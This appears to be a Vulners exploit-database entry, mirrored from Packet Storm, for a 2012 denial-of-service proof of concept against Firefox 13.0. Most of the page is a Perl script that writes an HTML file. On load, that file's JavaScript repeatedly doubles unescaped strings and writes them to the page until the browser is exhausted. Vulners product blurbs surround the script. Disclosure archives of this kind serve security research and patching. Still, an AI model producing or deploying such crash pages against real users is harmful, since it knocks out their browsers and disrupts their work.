Lucene search
+L

Mozilla Firefox Web Browser 13.0 Remote Denial Of Service

🗓️ 14 Jun 2012 00:00:00Reported by Ucha GobejishviliType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 18 Views

Mozilla Firefox Web Browser 13.0 Remote Denial Of Service vulnerability proof of concept exploit in Perl scrip

Code
`#!/usr/bin/perl  
# Mozilla Firefox Web Browser 13.0 Remote Denial-of-service Exploit Proof  
of Concept  
# Author: Ucha Gobejishvili  
  
use Term::ANSIColor qw(:constants);  
  
open FH, ">poc.html";  
  
print FH "<html>  
<title>Hello World!</title>  
<head>  
<script>  
function boom()  
{  
  
var longunistring1 = unescape('%u4141%u4141');  
var longunistring2 = unescape('%u4242%u4242');  
var longunistring3 = unescape('%u4343%u4343');  
var longunistring4 = unescape('%u4444%u4444');  
  
for(i=0; i <= 60 ; ++i)  
{  
longunistring1+=longunistring1;  
longunistring2+=longunistring2;  
longunistring3+=longunistring3;  
longunistring4+=longunistring4;  
document.write(longunistring1);  
document.write(longunistring2);  
document.write(longunistring3);  
document.write(longunistring4);  
}  
document.write(longunistring1);  
document.write(longunistring2);  
document.write(longunistring3);  
document.write(longunistring4);  
}  
</script>  
</head>  
<body onLoad='boom()'>  
<H1> Working! </h1>  
</body>  
</html> \n";  
close FH;  
  
print RED, "POC Created.";  
  
print " \n";  
  
exit;  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Jun 2012 00:00Current
0.3Low risk
Vulners AI Score0.3
18